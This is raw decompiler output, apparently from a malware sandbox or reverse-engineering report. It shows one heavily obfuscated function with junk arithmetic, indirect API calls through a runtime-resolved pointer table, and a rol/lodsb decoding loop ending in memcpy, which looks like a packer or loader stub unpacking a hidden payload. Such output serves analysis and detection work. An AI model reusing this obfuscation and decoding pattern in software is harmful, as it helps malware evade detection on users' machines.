				signed int _t513;
				signed int _t516;
				signed int _t521;
				void* _t523;
				void* _t525;
				intOrPtr _t526;
				void _t529;
				signed int _t533;
				intOrPtr _t539;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t557;
				void* _t560;
				signed int _t565;
				signed int _t566;
				signed int _t569;
				void* _t573;
				void* _t575;
				signed int _t576;
				signed int _t579;
				intOrPtr _t581;
				signed int _t587;
				signed int _t589;
				void* _t592;
				void* _t594;
				signed int _t595;
				void* _t599;
				void* _t601;
				intOrPtr _t602;
				void* _t605;
				void* _t607;
				void* _t608;
				signed int _t613;
				signed int _t614;
				void* _t616;
				void* _t618;
				signed int _t623;
				void* _t625;
				signed int _t626;
				signed int _t629;
				signed int _t637;
				void* _t639;
				void* _t641;
				void* _t642;
				signed int _t645;
				signed int _t648;
				signed int _t660;
				signed int _t663;
				signed int _t665;
				signed int _t672;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				signed int _t682;
				void* _t685;
				signed int _t692;
				signed int _t693;
				signed int _t702;
				signed int _t704;
				signed int _t706;
				signed int _t708;
				signed int _t712;
				signed int _t714;
				signed int _t717;
				signed int _t720;
				void* _t723;
				signed int _t725;
				signed int _t727;
				signed int _t730;
				signed int _t731;
				signed int _t733;
				signed int _t740;
				signed int _t741;
				signed int _t746;
				signed int _t749;
				signed int _t751;
				signed int _t753;
				signed int _t755;
				signed int _t758;
				signed int _t761;
				signed int _t765;
				signed int _t769;
				signed int _t774;
				signed int _t779;
				signed int _t784;
				signed int _t787;
				signed int _t790;
				signed int _t792;
				signed int _t795;
				signed int _t798;
				void* _t803;
				void* _t810;
				signed int _t812;
				signed int _t815;
				signed int _t820;
				signed int _t823;
				signed int _t825;
				signed int _t828;
				signed int _t834;
				signed int _t839;
				void* _t840;
				signed int _t844;
				signed int _t849;
				void* _t851;
				signed int _t853;
				signed int _t856;
				signed int _t859;
				signed int _t863;
				signed int _t864;
				signed int _t867;
				signed int _t871;
				signed int _t874;
				signed int _t878;
				signed int* _t879;
				signed int* _t880;
				signed int* _t881;
				signed int* _t882;
				signed int* _t883;
				signed int* _t884;
				signed int* _t885;
				signed int* _t889;
				signed int* _t890;
				signed int* _t891;
				signed int* _t892;
				signed int* _t893;
				signed int* _t894;
				signed int* _t895;
				signed int* _t896;
				signed int* _t897;
				signed int* _t898;
				signed int* _t899;
				signed int* _t900;

				_t740 = __edx;
				_t660 = __ebx;
				_push(__edi);
				 *_t878 =  *_t878 ^ __edi;
				 *_t878 =  *_t878 | _t863;
				_t864 = _t878;
				_t879 = _t878 + 0xffffffdc;
				_push(__edi);
				 *_t879 =  *_t879 ^ __edi;
				 *_t879 =  *_t879 | __ebx;
				_push(_a8);
				_pop( *_t2);
				_push(_v40);
				_pop(_t792);
				_t675 = _v48;
				_v48 =  *((intOrPtr*)(_t792 + 0xc));
				_pop( *_t6);
				_v48 =  *((intOrPtr*)(_t792 + 4));
				_pop(_t834);
				 *_t9 = _t864;
				if(_v20 == 1) {
					_v12 = 7;
					_v16 = 1;
					_v28 = 8;
				}
				if(_v20 != 0) {
					if(_v20 != 2) {
						if(_v20 == 4) {
							_t312 = _t660 + 0x41d1be; // 0x41d1be
							_v48 = _t312;
							_t314 = _t660 + 0x41c0a8; // 0x41c0a8
							 *_t879 =  *_t879 & 0x00000000;
							 *_t879 =  *_t879 ^ _t314;
							_push( *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40));
							_pop( *_t316);
							_push(_v36);
							_pop( *_t318);
							_v12 = 1;
							_t320 = _t660 + 0x41c6f8; // 0x41c6f8
							_v36 = _v36 & 0x00000000;
							 *_t879 =  *_t879 ^ _t320;
							_t544 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36);
							_v36 = _t740;
							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) & 0x00000000;
							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) | _t740 ^ _v36 | _t544;
							_t769 = _v36;
							_v16 = 0x55;
							_t333 = _t660 + 0x41c356; // 0x41c356
							_v32 = _v32 & 0x00000000;
							 *_t879 =  *_t879 | _t333;
							_t546 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
							_v40 = _t792;
							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) & 0x00000000;
							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) | _t792 & 0x00000000 ^ _t546;
							_t792 = _v40;
							_v28 = 2;
							_t345 = _t660 + 0x41cc3e; // 0x41cc3e
							_v40 = _v40 & 0x00000000;
							 *_t879 =  *_t879 ^ _t345;
							_t349 = _t660 + 0x41cf5b; // 0x41cf5b
							 *_t879 =  *_t879 ^ _t834;
							 *_t879 = _t349;
							_t498 =  *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40);
							_v36 = _t769;
							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) & 0x00000000;
							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) | _t769 & 0x00000000 | _t498;
							_t740 = _v36;
						}
					} else {
						_t221 = _t660 + 0x41cb7a; // 0x41cb7a
						_v32 = 0;
						_v48 = _v48 + _t221;
						_t224 = _t660 + 0x41c8ec; // 0x41c8ec
						_v40 = 0;
						 *_t879 =  *_t879 ^ _t224;
						_t551 =  *((intOrPtr*)(_t660 + 0x41f068))(_v40, _v32);
						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) & 0x00000000;
						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) ^ (_t834 & 0x00000000 | _t551);
						_t844 = _t834;
						_t232 = _t660 + 0x41c379; // 0x41c379
						_v36 = _v36 & 0x00000000;
						 *_t879 =  *_t879 + _t232;
						_t236 = _t660 + 0x41c532; // 0x41c532
						_v36 = _v36 & 0x00000000;
						 *_t879 =  *_t879 | _t236;
						_t554 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v36);
						 *_t879 = _t554;
						_t242 = _t660 + 0x41d201; // 0x41d201
						 *_t879 = _t242;
						_t556 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v40);
						_t702 = _t675 & 0x00000000 |  *_t879;
						_t889 =  &(_t879[1]);
						 *_t889 =  *_t889 + _t792;
						_t810 = _t556;
						_t557 = _t810 + _t702;
						_t812 = 0;
						_t704 = _t702 & 0x00000000 ^ (_t557 ^  *_t889 |  *(_t660 + 0x41cc21));
						_t560 = _t557;
						if(_t704 > _t560) {
							_t246 = _t660 + 0x41c532; // 0x41c532
							 *_t889 =  *_t889 & 0x00000000;
							 *_t889 =  *_t889 | _t246;
							_t247 = _t660 + 0x41d201; // 0x41d201
							_v40 = _v40 & 0x00000000;
							 *_t889 =  *_t889 | _t247;
							_t587 =  *((intOrPtr*)(_t660 + 0x41f064))(_v40, _t740);
							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) & 0x00000000;
							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) | _t864 -  *_t889 ^ _t587;
							_t864 = _t864;
						}
						_t890 = _t889 - 0xfffffffc;
						 *_t890 =  *_t890 & 0x00000000;
						 *_t890 =  *_t890 |  *_t889;
						_t256 = _t660 + 0x41d01d; // 0x41d01d
						 *_t890 =  *_t890 ^ _t812;
						 *_t890 =  *_t890 | _t256;
						_t257 = _t660 + 0x41c37d; // 0x41c37d
						 *_t890 = _t257;
						_t565 =  *((intOrPtr*)(_t660 + 0x41f068))(_v32, _t812, _t740);
						_v36 = _t812;
						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) & 0x00000000;
						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) | _t812 & 0x00000000 | _t565;
						_t815 = _v36;
						_t566 =  *((intOrPtr*)(_t660 + 0x41f060))();
						 *_t890 =  *_t890 ^ _t844;
						 *_t890 =  *_t890 | _t566;
						_t267 = _t660 + 0x41c8c2; // 0x41c8c2
						 *_t890 =  *_t890 - _t660;
						 *_t890 =  *_t890 + _t267;
						_t268 = _t660 + 0x41c737; // 0x41c737
						 *_t890 =  *_t890 & 0x00000000;
						 *_t890 =  *_t890 ^ _t268;
						_t569 =  *((intOrPtr*)(_t660 + 0x41f068))(_t815, _t660, _t844);
						 *_t270 = _t569;
						_push(_v36);
						_pop( *_t272);
						_t891 = _t890 - 0xfffffffc;
						_v36 = _t815;
						 *(_t660 + 0x41c606) = _t569 & 0x00000000 |  *_t890;
						_t792 = _v36;
						_v12 = 3;
						_t277 = _t660 + 0x41d2fe; // 0x41d2fe
						_v32 = 0;
						 *_t891 =  *_t891 | _t277;
						_t573 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
						 *_t891 =  *_t891 ^ _t792;
						 *_t891 =  *_t891 + _t573;
						_t281 = _t660 + 0x41d22a; // 0x41d22a
						_v40 = _v40 & 0x00000000;
						 *_t891 =  *_t891 | _t281;
						_t575 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t792);
						_t706 = _t704 & 0x00000000 |  *_t891;
						_t879 =  &(_t891[1]);
						_v40 = _t740;
						_push(_t706 + _t575);
						_t774 = _v40;
						_pop(_t576);
						_v36 = _t576;
						_t708 = _t706 & 0x00000000 ^ (_t576 ^ _v36 |  *(_t660 + 0x41c48f));
						_t579 = _v36;
						if(_t708 > _t579) {
							_t292 = _t660 + 0x41d2fe; // 0x41d2fe
							_v40 = _v40 & 0x00000000;
							 *_t879 =  *_t879 + _t292;
							_t296 = _t660 + 0x41d22a; // 0x41d22a
							_v36 = 0;
							 *_t879 =  *_t879 ^ _t296;
							_t579 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v40);
						}
						 *_t879 = _t844;
						 *(_t660 + 0x41c2cf) = 0 ^ _t579;
						_t834 = 0;
						_v16 = 0x11;
						_t302 = _t660 + 0x41d09f; // 0x41d09f
						 *_t879 =  *_t879 - _t792;
						 *_t879 =  *_t879 + _t302;
						_t581 =  *((intOrPtr*)(_t660 + 0x41f060))(_t792);
						_v40 = _t708;
						 *((intOrPtr*)(_t660 + 0x41ce4e)) = _t581;
						_t675 = _v40;
						_v28 = 4;
						_t308 = _t660 + 0x41c4f7; // 0x41c4f7
						 *_t879 =  *_t879 ^ _t675;
						 *_t879 =  *_t879 + _t308;
						_t498 =  *((intOrPtr*)(_t660 + 0x41f060))(_t675);
						 *_t879 = _t774;
						 *(_t660 + 0x41c895) = 0 ^ _t498;
						_t740 = 0;
					}
					_t741 = _t740 ^ _t740;
					_v48 = _v48 - _t792;
					_v48 = _t741;
					_t357 = _t660 + 0x41c61d; // 0x41c61d
					 *_t879 =  *_t879 ^ _t834;
					 *_t879 = _t357;
					_t503 =  *((intOrPtr*)(_t660 + 0x41f060))(_t834, _t792, _t498);
					 *_t879 = _t503;
					_t360 = _t660 + 0x41cf67; // 0x41cf67
					_v40 = 0;
					 *_t879 =  *_t879 ^ _t360;
					_t505 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _v32);
					_pop( *_t364);
					_t677 = _t675 & 0x00000000 ^ _v40;
					_v40 = _t792;
					_push(_t677 + _t505);
					_t795 = _v40;
					_pop(_t506);
					_t679 = _t677 & 0x00000000 | _t864 & 0x00000000 ^  *(_t660 + 0x41c5dc);
					_t867 = _t864;
					if(_t679 > _t506) {
						_t369 = _t660 + 0x41c61d; // 0x41c61d
						_v32 = 0;
						 *_t879 =  *_t879 ^ _t369;
						_t372 = _t660 + 0x41cf67; // 0x41cf67
						_v36 = 0;
						 *_t879 =  *_t879 | _t372;
						_t539 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v32);
						_v32 = _t679;
						 *((intOrPtr*)(_t660 + 0x41cf4f)) = _t539;
						_t679 = _v32;
					}
					_t880 =  &(_t879[1]);
					 *_t880 = _t679;
					_t682 = 0;
					 *_t880 = _t741 & 0x00000000 |  *_t879;
					_t381 = _t660 + 0x41cef6; // 0x41cef6
					_v32 = _v32 & 0x00000000;
					 *_t880 =  *_t880 | _t381;
					_t385 = _t660 + 0x41ceb9; // 0x41ceb9
					 *_t880 =  *_t880 ^ _t867;
					 *_t880 =  *_t880 ^ _t385;
					_t510 =  *((intOrPtr*)(_t660 + 0x41f068))(_t867, _v32, _v40);
					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) & 0x00000000;
					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) | _t682 ^  *_t880 | _t510;
					_t685 = _t682;
					_t881 = _t880 - 0xfffffffc;
					_t746 = _t510 % _v28;
					 *_t881 =  *_t881 & 0x00000000;
					 *_t881 =  *_t881 | _t746;
					_t397 = _t660 + 0x41c52d; // 0x41c52d
					_v40 = 0;
					 *_t881 =  *_t881 ^ _t397;
					_t513 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t685);
					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) & 0x00000000;
					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) | _t746 & 0x00000000 | _t513;
					_t749 = _t746;
					_t751 = _t749 & 0x00000000 ^  *_t881;
					_t882 = _t881 - 0xfffffffc;
					_v8 = _v8 - _t751;
					_v40 = 0;
					 *_t882 =  *_t882 | _t751;
					_t409 = _t660 + 0x41c7ee; // 0x41c7ee
					 *_t882 =  *_t882 ^ _t795;
					 *_t882 =  *_t882 ^ _t409;
					_t410 = _t660 + 0x41c513; // 0x41c513
					_v36 = 0;
					 *_t882 =  *_t882 | _t410;
					_t516 =  *((intOrPtr*)(_t660 + 0x41f068))(_v36, _t795, _v40, _t685);
					_v36 = _t834;
					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) & 0x00000000;
					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) ^ _t834 & 0x00000000 ^ _t516;
					_t753 =  *_t882;
					_t883 =  &(_t882[1]);
					_v32 = _t516;
					_v24 = _v24 & 0x00000000;
					_v24 = _v24 | _t516 ^ _v32 ^ _t753;
					_t427 = _t660 + 0x41ccc7; // 0x41ccc7
					_v40 = 0;
					 *_t883 =  *_t883 | _t427;
					_t521 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40);
					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) & 0x00000000;
					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) | _t795 -  *_t883 | _t521;
					_t798 = _t795;
					_t839 = _v36 & 0x00000000 ^ _t660 & 0x00000000 ^ _a4;
					_t663 = _t660;
					_t436 = _t663 + 0x41c550; // 0x41c550
					_v36 = 0;
					 *_t883 =  *_t883 + _t436;
					_t523 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36);
					_v36 = 0;
					 *_t883 =  *_t883 + _t523;
					_t442 = _t663 + 0x41d34c; // 0x41d34c
					 *_t883 = _t442;
					_t525 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36, _v36);
					_t884 = _t883 - 0xfffffffc;
					 *_t445 = _t525;
					_v40 = _v40 + (0 ^  *_t883);
					_push(_v40);
					_pop(_t526);
					_t755 = _t753;
					_v32 = _t755;
					_t758 = _v32;
					if( *((intOrPtr*)(_t663 + 0x41ccf8)) > _t526) {
						_t452 = _t663 + 0x41c550; // 0x41c550
						_v32 = _v32 & 0x00000000;
						 *_t884 =  *_t884 + _t452;
						_t456 = _t663 + 0x41d34c; // 0x41d34c
						_v32 = _v32 & 0x00000000;
						 *_t884 =  *_t884 + _t456;
						_t526 =  *((intOrPtr*)(_t663 + 0x41f064))(_v32, _v32);
					}
					_v40 = _t758;
					 *((intOrPtr*)(_t663 + 0x41ce46)) = _t526;
					_t761 = _v40;
					_v32 = _t761;
					_t466 = _t663 + 0x41cb9d; // 0x41cb9d
					 *_t884 =  *_t884 - _t839;
					 *_t884 =  *_t884 | _t466;
					_t467 = _t663 + 0x41cd17; // 0x41cd17
					_v36 = _v36 & 0x00000000;
					 *_t884 =  *_t884 | _t467;
					_t529 =  *((intOrPtr*)(_t663 + 0x41f068))(_v36, _t839);
					 *_t884 = _t798 & 0x00000000 | _t761 & 0x00000000 ^ _t839;
					 *(_t663 + 0x41d015) = 0 ^ _t529;
					_t803 = 0;
					_t840 = _t839 - 1;
					_v32 = 0;
					_push(_v32);
					 *_t884 =  *_t884 | _t663;
					do {
						 *_t475 = _t803;
						_push(_v36);
						_pop(_t692);
						_t693 = _t692 & _v12;
						if(_t693 == 0) {
							_t840 = _t840 + 1;
							_t529 = _t529 & 0x00000000 ^ (_t803 -  *_t884 | _v28);
							_t803 = _t803;
							_t663 =  *(_t529 + _t840) & 0x000000ff;
						}
						_push(_v16);
						_pop( *_t481);
						_push(_v36);
						_pop(_t765);
						asm("rol edx, cl");
						asm("lodsb");
						_t529 = _t529 | _t765 & _t663;
						 *_t803 = _t529;
						_t803 = _t803 + 1;
						_t483 =  &_v8;
						 *_t483 = _v8 - 1;
					} while ( *_t483 != 0);
					_t665 =  *_t884;
					_t885 =  &(_t884[1]);
					_t485 = _t665 + 0x41cc0b; // 0x41cc0b
					 *_t885 =  *_t885 & 0x00000000;
					 *_t885 =  *_t885 ^ _t485;
					_t486 = _t665 + 0x41cbd0; // 0x41cbd0
					 *_t885 =  *_t885 & 0x00000000;
					 *_t885 =  *_t885 | _t486;
					_t533 =  *((intOrPtr*)(_t665 + 0x41f068))(_t867, _t693);
					_v36 = _t693;
					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) & 0x00000000;
					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) ^ (_t693 ^ _v36 | _t533);
					_v32 = _t665;
					return memcpy(_t803, _t840 + 1, _v24);
				} else {
					_pop( *_t15);
					_t672 = _t660 & 0x00000000 ^ _v32;
					_t17 = _t672 + 0x41cb24; // 0x41cb24
					_v32 = 0;
					 *_t879 =  *_t879 | _t17;
					_t589 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32);
					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) & 0x00000000;
					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) ^ _t792 ^ _v48 ^ _t589;
					_t820 = _t792;
					_t25 = _t672 + 0x41c2ba; // 0x41c2ba
					_v48 = _v48 ^ _t820;
					_v48 = _t25;
					_t26 = _t672 + 0x41d1a6; // 0x41d1a6
					 *_t879 =  *_t879 ^ _t820;
					 *_t879 =  *_t879 + _t26;
					_t592 =  *((intOrPtr*)(_t672 + 0x41f060))(_t820, _t820);
					 *_t879 =  *_t879 - _t864;
					 *_t879 =  *_t879 + _t592;
					_t28 = _t672 + 0x41c035; // 0x41c035
					 *_t879 =  *_t879 & 0x00000000;
					 *_t879 =  *_t879 | _t28;
					_t594 =  *((intOrPtr*)(_t672 + 0x41f060))(_t740, _t864);
					_t712 =  *_t879;
					_t892 =  &(_t879[1]);
					_v40 = _t820;
					_push(_t712 + _t594);
					_t823 = _v40;
					_pop(_t595);
					_v40 = _t834;
					_t714 = _t712 & 0x00000000 ^ _t834 & 0x00000000 ^  *(_t672 + 0x41c8ae);
					_t849 = _v40;
					if(_t714 > _t595) {
						_t35 = _t672 + 0x41d1a6; // 0x41d1a6
						 *_t892 =  *_t892 & 0x00000000;
						 *_t892 =  *_t892 ^ _t35;
						_t36 = _t672 + 0x41c035; // 0x41c035
						 *_t892 = _t36;
						_t595 =  *((intOrPtr*)(_t672 + 0x41f064))(_v40, _t672);
						_push(0);
						 *_t892 = _t714;
						 *(_t672 + 0x41d244) = 0 ^ _t595;
					}
					_t893 = _t892 - 0xfffffffc;
					 *_t893 =  *_t893 - _t849;
					 *_t893 =  *_t893 ^ (_t595 & 0x00000000 |  *_t892);
					_t40 = _t672 + 0x41cd30; // 0x41cd30
					 *_t893 =  *_t893 ^ _t849;
					 *_t893 =  *_t893 + _t40;
					_t599 =  *((intOrPtr*)(_t672 + 0x41f060))(_t849, _t849);
					_v36 = 0;
					 *_t893 =  *_t893 + _t599;
					_t44 = _t672 + 0x41c116; // 0x41c116
					 *_t893 = _t44;
					_t601 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
					_t894 =  &(_t893[1]);
					 *_t47 = _t601;
					_v40 = _v40 + (0 ^  *_t893);
					_push(_v40);
					_pop(_t602);
					_t851 = _t849;
					_v40 = _t740;
					_t717 = 0 ^  *(_t672 + 0x41d282);
					_t779 = _v40;
					if(_t717 > _t602) {
						_t54 = _t672 + 0x41cd30; // 0x41cd30
						_v36 = _v36 & 0x00000000;
						 *_t894 =  *_t894 + _t54;
						_t58 = _t672 + 0x41c116; // 0x41c116
						 *_t894 = _t58;
						_t602 =  *((intOrPtr*)(_t672 + 0x41f064))(_v36, _v36);
					}
					_v32 = _t779;
					 *((intOrPtr*)(_t672 + 0x41d2af)) = _t602;
					_t64 = _t672 + 0x41c00f; // 0x41c00f
					_v36 = 0;
					 *_t894 =  *_t894 | _t64;
					_t67 = _t672 + 0x41c17e; // 0x41c17e
					_v40 = _v40 & 0x00000000;
					 *_t894 =  *_t894 | _t67;
					_t605 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
					_v40 = 0;
					 *_t894 =  *_t894 + _t605;
					_t74 = _t672 + 0x41cf79; // 0x41cf79
					 *_t894 =  *_t894 & 0x00000000;
					 *_t894 =  *_t894 | _t74;
					_t607 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
					 *_t76 = _t717;
					_push(_v32);
					 *_t78 = _t607;
					_v32 = _v32 + (_t717 & 0x00000000) + _v40;
					_push(_v32);
					_pop(_t608);
					_pop(_t784);
					_push( *((intOrPtr*)(_t672 + 0x41cc9b)));
					_pop( *_t83);
					_push(_v40);
					_pop(_t720);
					if(_t720 > _t608) {
						_t85 = _t672 + 0x41c17e; // 0x41c17e
						 *_t894 =  *_t894 & 0x00000000;
						 *_t894 =  *_t894 + _t85;
						_t86 = _t672 + 0x41cf79; // 0x41cf79
						_v32 = _v32 & 0x00000000;
						 *_t894 =  *_t894 ^ _t86;
						_push( *((intOrPtr*)(_t672 + 0x41f064))(_v32, _t784));
						_pop( *_t91);
						_push(_v40);
						_pop( *_t93);
					}
					_t895 =  &(_t894[1]);
					 *_t895 =  *_t894;
					_t95 = _t672 + 0x41cd11; // 0x41cd11
					 *_t895 =  *_t895 & 0x00000000;
					 *_t895 =  *_t895 + _t95;
					_t96 = _t672 + 0x41c5be; // 0x41c5be
					_v40 = _v40 & 0x00000000;
					 *_t895 =  *_t895 ^ _t96;
					_t613 =  *((intOrPtr*)(_t672 + 0x41f068))(_v40, _t864, _v36);
					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) & 0x00000000;
					 *(_t672 + 0x41caaa) =  *(_t672 + 0x41caaa) ^ (_t720 & 0x00000000 | _t613);
					_t723 = _t720;
					_t614 =  *((intOrPtr*)(_t672 + 0x41f068))();
					 *_t895 =  *_t895 & 0x00000000;
					 *_t895 =  *_t895 ^ _t614;
					_t106 = _t672 + 0x41d112; // 0x41d112
					_v36 = 0;
					 *_t895 =  *_t895 + _t106;
					_t616 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36, _t823);
					 *_t895 =  *_t895 - _t723;
					 *_t895 =  *_t895 + _t616;
					_t110 = _t672 + 0x41c899; // 0x41c899
					_v40 = 0;
					 *_t895 =  *_t895 | _t110;
					_t618 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t723);
					_t725 =  *_t895;
					_t896 =  &(_t895[1]);
					 *_t114 = _t618;
					_v36 = _v36 + _t725;
					_push(_v36);
					_pop(_t619);
					_t853 = _t851;
					_v32 = _t784;
					_t727 = _t725 & 0x00000000 | _t784 - _v32 ^  *(_t672 + 0x41c8e8);
					_t787 = _v32;
					if(_t727 > _t619) {
						_t122 = _t672 + 0x41d112; // 0x41d112
						_v40 = _v40 & 0x00000000;
						 *_t896 =  *_t896 ^ _t122;
						_t126 = _t672 + 0x41c899; // 0x41c899
						 *_t896 =  *_t896 - _t672;
						 *_t896 =  *_t896 | _t126;
						_push( *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v40));
						_pop( *_t128);
						_push(_v40);
						_pop( *_t130);
					}
					_t897 =  &(_t896[1]);
					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) & 0x00000000;
					 *(_t672 + 0x41d0d6) =  *(_t672 + 0x41d0d6) ^ _t853 ^  *_t897 ^  *_t896;
					_t856 = _t853;
					_t135 = _t672 + 0x41cc19; // 0x41cc19
					 *_t897 = _t135;
					_t623 =  *((intOrPtr*)(_t672 + 0x41f060))(_v36);
					_v32 = _v32 & 0x00000000;
					 *_t897 =  *_t897 ^ _t623;
					_t141 = _t672 + 0x41c058; // 0x41c058
					_v32 = 0;
					 *_t897 =  *_t897 + _t141;
					_t625 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32, _v32);
					_t898 = _t897 - 0xfffffffc;
					 *_t145 = _t625;
					_v40 = _v40 + (_t727 & 0x00000000) +  *_t897;
					_push(_v40);
					_pop(_t626);
					_t825 = _t823;
					_v36 = _t787;
					_t730 =  *(_t672 + 0x41c493);
					_t790 = _v36;
					if(_t730 > _t626) {
						_t152 = _t672 + 0x41cc19; // 0x41cc19
						 *_t898 =  *_t898 ^ _t730;
						 *_t898 =  *_t898 | _t152;
						_t153 = _t672 + 0x41c058; // 0x41c058
						 *_t898 =  *_t898 & 0x00000000;
						 *_t898 =  *_t898 + _t153;
						_t626 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _t730);
					}
					 *_t898 = _t856;
					 *(_t672 + 0x41d0de) = 0 ^ _t626;
					_t859 = 0;
					_t899 = _t864;
					_pop(_t871);
					_t156 = _t672 + 0x41c23b; // 0x41c23b
					 *_t899 =  *_t899 ^ _t790;
					 *_t899 = _t156;
					_t157 = _t672 + 0x41c2e1; // 0x41c2e1
					_v8 = _v8 - _t859;
					_v8 = _v8 | _t157;
					_t629 =  *((intOrPtr*)(_t672 + 0x41f068))(_t859, _t790);
					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) & 0x00000000;
					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) ^ _t825 & 0x00000000 ^ _t629;
					_t828 = _t825;
					_t163 = _t672 + 0x41c6d4; // 0x41c6d4
					_v12 = _v12 ^ _t730;
					_v12 = _v12 + _t163;
					_t164 = _t672 + 0x41cc84; // 0x41cc84
					_v16 = _t164;
					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v32, _t730));
					_pop( *_t167);
					_push(_v40);
					_pop( *_t169);
					_t900 =  &(_t899[1]);
					_v16 = _v16 - _t730;
					_v16 = _v16 + (0 ^ _v16);
					_t170 = _t672 + 0x41c719; // 0x41c719
					_v40 = _v40 & 0x00000000;
					_v20 = _v20 ^ _t170;
					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t730));
					_pop( *_t175);
					_push(_v36);
					_pop( *_t177);
					_t637 =  *((intOrPtr*)(_t672 + 0x41f060))();
					_v32 = 0;
					_v24 = _v24 ^ _t637;
					_t181 = _t672 + 0x41d2e8; // 0x41d2e8
					_v28 = _v28 ^ _t828;
					_v28 = _v28 | _t181;
					_t639 =  *((intOrPtr*)(_t672 + 0x41f060))(_t828, _v32);
					_v32 = 0;
					_v32 = _v32 + _t639;
					_t185 = _t672 + 0x41ca71; // 0x41ca71
					_v36 = _t185;
					_t641 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v32);
					_pop( *_t188);
					_t731 = _v36;
					_v36 = _t859;
					_push(_t731 + _t641);
					_pop(_t642);
					_t733 = _t731 & 0x00000000 ^ _t871 & 0x00000000 ^  *(_t672 + 0x41c0c4);
					_t874 = _t871;
					if(_t733 > _t642) {
						_t193 = _t672 + 0x41d2e8; // 0x41d2e8
						_v32 = 0;
						 *_t900 =  *_t900 | _t193;
						_t196 = _t672 + 0x41ca71; // 0x41ca71
						 *_t900 =  *_t900 & 0x00000000;
						 *_t900 =  *_t900 ^ _t196;
						_t648 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v32);
						_push(_t874);
						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) & 0x00000000;
						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) | _t874 ^  *_t900 | _t648;
					}
					_pop( *_t202);
					_v40 = _t733;
					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) & 0x00000000;
					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) | _t733 & 0x00000000 ^ _v36;
					_t210 = _t672 + 0x41cefe; // 0x41cefe
					 *_t900 = _t210;
					_t645 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
					_v40 = _t828;
					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) & 0x00000000;
					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) | _t828 - _v40 ^ _t645;
					return _t645;
				}
			}

0x03333a14
0x03333a14
0x03333a14
0x03333a15
0x03333a18
0x03333a1b
0x03333a1d
0x03333a20
0x03333a21
0x03333a24
0x03333a27
0x03333a2a
0x03333a2d
0x03333a30
0x03333a35
0x03333a35
0x03333a38
0x03333a40
0x03333a44
0x03333a45
0x03333a4c
0x03333a4e
0x03333a55
0x03333a5c
0x03333a5c
0x03333a67
0x03334153
0x0333446d
0x03334473
0x0333447c
0x0333447f
0x03334486
0x0333448a
0x03334493
0x03334494
0x03334497
0x0333449a
0x033344a0
0x033344a7
0x033344ad
0x033344b4
0x033344b7
0x033344bd
0x033344c5
0x033344cc
0x033344d2
0x033344d5
0x033344dc
0x033344e2
0x033344e9
0x033344ec
0x033344f2
0x033344fa
0x03334501
0x03334507
0x0333450a
0x03334511
0x03334517
0x0333451e
0x03334521
0x03334528
0x0333452b
0x0333452e
0x03334534
0x0333453c
0x03334543
0x03334549
0x03334549
0x03334159
0x03334159
